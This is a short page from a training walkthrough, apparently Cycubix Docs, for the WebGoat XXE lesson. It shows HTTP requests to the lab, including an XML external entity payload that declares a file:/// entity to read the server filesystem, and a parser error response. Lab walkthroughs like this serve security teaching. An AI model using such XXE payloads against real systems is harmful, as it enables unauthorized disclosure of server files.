A5:2021 | Security Misconfiguration (5) | Cycubix Docs
POST /WebGoat/xxe/simple
Content-Type: application/xml
<?xml version="1.0"?><comment><text>This is my first comment, nice picture</text></comment>POST /WebGoat/xxe/simple
Content-Type: application/xml
<?xml version="1.0" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>{
"lessonCompleted" : false,
"feedback" : "Sorry the solution is not correct, please try again.",
"output" : "...javax.xml.stream.XMLStreamException: ParseError at [row,col]:[1,44]\\nMessage: The processing instruction target matching \\\"[xX][mM][lL]\\\" is not allowed.]"
"assignment" : "SimpleXXE",
"attemptWasMade" : true
}PreviousA5:2021 | Security Misconfiguration (4) | Cycubix DocsNextA5:2021 | Security Misconfiguration (6) | Cycubix Docs
Last updated
Was this helpful?

